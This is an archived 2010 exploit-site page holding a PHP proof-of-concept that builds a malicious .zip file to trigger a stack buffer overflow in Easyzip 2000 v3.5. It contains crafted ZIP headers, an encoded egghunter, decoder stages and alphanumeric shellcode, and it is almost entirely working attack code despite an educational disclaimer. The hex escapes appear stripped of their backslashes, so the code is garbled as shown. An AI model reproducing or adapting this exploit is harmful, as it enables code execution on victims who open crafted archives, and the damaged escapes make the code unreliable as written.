Easyzip 2000 v3.5 (.zip) 0day stack buffer overflow PoC expl
Posted on 25 April 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Easyzip 2000 v3.5 (.zip) 0day stack buffer overflow PoC exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================================== Easyzip 2000 v3.5 (.zip) 0day stack buffer overflow PoC exploit =============================================================== <?php /* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Easyzip 2000 v3.5 (.zip) 0day stack buffer overflow PoC exploit Author: mr_me - http://net-ninja.net/ Download: http://www.thefreesite.com/ezip35.exe Platform: Windows XP sp3 Advisory: http://www.corelan.be:8800/advisories.php?id=10-032 Greetz to: Corelan Security Team http://www.corelan.be:8800/index.php/security/corelan-team-members/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Script provided 'as is', without any warranty. Use for educational purposes only. Do not use this code to do anything illegal ! Note : you are not allowed to edit/modify this code. If you do, Corelan cannot be held responsible for any damages this may cause. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ascii lowercase and payload space < 400 bytes, yet we still get code execution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */ // local file header $lf_header = "x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00". "x00x00x00x00x00x00x00x00xe4x0fx00x00x00"; // central directory file header $cdf_header = "x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00". "x00x00x00x00x00x00x00x00x00xe4x0fx00x00x00x00x00x00x01x00". "x24x00x00x00x00x00x00x00"; // end of central directory record $efcdr_record = "x50x4Bx05x06x00x00x00x00x01x00x01x00". "x12x10x00x00x02x10x00x00x00x00"; // filename $_____name = "x6Dx72x5Fx6Dx65x73x5Fx73x65x63x72x65x63x74". "x5Fx70x61x73x73x77x6Fx72x64x73x2Ex74x78x74"; // corelan security team msgbox $_____sc = "VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJEON4F1W9M490R0P08654E2". "M9Y2F64346K5K450115MN2G0N0B0L5C5DKO106737KO9W8P0O2L1L0P184E3U0Q8P1G3L5O9R601E671O9W". "343QOO113RJOLK8M640M1K3WOL1W4Y2O613V2I4K5C0R0S0PMO2O3W2O8K9R1Z1K0S1H3PLMKM5KKK8M0S4". "JJL15612J1267KM2K4D903K03"; // lowercase ascii encoded egghunter $eh = "j314d34djq34djk34d1431s11s7j314d34dj234dkms502ds5o0d35upj51g4241n20b0d5". "225737445m51c5k5dk4j49b591e7b5k4k385bk2j55bk59359927"; $decoderStage1 = "x25x4ax4dx4ex55x25x35x08x31x2a". "x2dx49x49x49x5ex2dx4ax49x4ax5ex2dxc1xc1xc1x5f"; $decoderStage2 = "x25x4Ax4dx4ex55x25x10x10x31x10". "x2dx2ax69x37xc1x2dx2ax69x36xc1x2dx2bx6axb1x9b"; $align = "x60".str_repeat("x5d",7); $___exploit = $_____name.str_repeat("x61",249).$eh.str_repeat("x61",144-strlen($eh))."x60". str_repeat("x5b",8).$decoderStage1.$align.$decoderStage2.$align."x98x8ex89xf1x64x64". "x16x32x40x00"; $___exploit .= str_repeat("x61",2000-strlen($___exploit))."x57x30x30x54x57x30x30x54".$_____sc. str_repeat("x61",2056-strlen($_____sc))."x2ex74x78x74"; $_____b00m = $lf_header.$___exploit.$cdf_header.$___exploit.$efcdr_record; file_put_contents("cst-easyzip.zip",$_____b00m); ?> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-25]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
